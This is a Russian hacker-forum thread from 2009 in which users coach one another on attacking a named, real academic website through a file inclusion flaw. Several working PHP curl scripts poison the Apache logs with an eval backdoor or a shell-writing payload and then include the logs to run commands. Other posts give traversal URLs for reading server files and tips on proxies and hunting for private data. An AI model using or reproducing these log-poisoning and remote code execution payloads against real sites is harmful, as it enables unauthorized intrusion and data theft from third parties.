ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.12.2009, 01:53
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз
|
|
|
16.12.2009, 01:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
PHP код:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');
#echo $a;
echo 'ok';
?>
|
|
|
|
16.12.2009, 02:13
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Сообщение от Pashkela
PHP код:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');
#echo $a;
echo 'ok';
?>
Pashkela, большое спасибо за код.
вот я проавильно подставил?
PHP код:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "<?php fwrite(fopen('shell.php','w+'),'<?php phpinfo();?>') ?>");
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log');
#echo $a;
echo 'ok';
?>
UDP:
я так понял этот код работает как браузер. токо отличие в том, что он не выводить лог. т.е. там #echo $a;
закоментировано, и поэтому не томозит?. я правильно понял?
UPD: Pashekela, помоги пожалуйста найти рабочие логи, несколько перебрал, не логируют...
вот конфиг http://www.impan.pl/~ecmtb11/index.php?file=../../../../usr/local/apache2/conf/httpd.conf
Последний раз редактировалось Matnya; 16.12.2009 в 02:30..
|
|
|
|
16.12.2009, 02:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
) Грины заманали прикалываться 
1. Одновременная запись данных юзер-агента в лог и их инклуд не прокатят - последовательно только
2. Где ты увидел в логах данные user-agent-ов? Там только ip и get-ы урлов.
3. Соответственно сначала get с php-кодом в строке URL, затем (второй раз вызов фукнции) уже инклуд
PHP код:
<?
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera');
curl_setopt($ch, CURLOPT_REFERER, "http://www.KAKASHKA.ru");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=<?eval(stripslashes($_REQUEST[cmd]));?>');
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log&cmd=phpinfo();');
echo $a;
#echo 'ok';
?>
в общем чото в этом роде, логи там мегов на 25 по-моему, но сегодня туда уже ничего не пишется. Ну и про прокси не забывай, кхм
PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад
Шутку с тильдой оценил)
Последний раз редактировалось Pashkela; 16.12.2009 в 02:46..
|
|
|
|
16.12.2009, 02:46
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
Провел на форуме:
48201
Репутация:
-55
|
|
Сообщение от Pashkela
PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад
точно, fopen(), бля какже я не заметил. ппц совсем крыша съехала...
PS Большой респект за консультацию. многое уточнил
А тут по подробней плиз)
Последний раз редактировалось Matnya; 16.12.2009 в 02:54..
|
|
|
|
16.12.2009, 02:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ну если вспомнить, что ты мне писал в личку, а говорили мы про тулзу, то чтобы брутить пути в ней, ссылку надо просто взять в одинарные кавычки )
|
|
|
|
16.12.2009, 03:29
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Matnya, и у тебя хватало наглости с такими знаниями выебываться на автора лфи брутера?
|
|
|
|
16.12.2009, 03:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от YuNi|[c
слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения
http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/
https://addons.mozilla.org/en-US/firefox/addon/7595
примерный перевод:
Последней версией Доступа - Меня является Деяние - Меня, инструмент имел обыкновение проверять некоторую уязвимость доступа, связанную с веб-приложениями. Инструмент работает, посылая несколько версий последнего запроса страницы. Запрос с удаленной сессией пошлют. Запрос, используя глагол ГОЛОВЫ HTTP и запрос, израсходовав сделанный глагол SECCOM пошлют. Комбинацию сессии и HEAD/SECCOM также пошлют.
В общем всех пошлют
|
|
|
|
16.12.2009, 05:22
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз
1. Открываешь сокет.
2. Пишешь в него запрос.
3. Закрываешь сокет.
Последний раз редактировалось [x26]VOLAND; 16.12.2009 в 05:32..
|
|
|
|
16.12.2009, 06:17
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Pashkela
http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/
https://addons.mozilla.org/en-US/firefox/addon/7595
примерный перевод:
В общем всех пошлют
как я понял нету разумного обьяснения во всем рунете!!!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.jpg?1760742){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
Похожие темы
Линейный вид
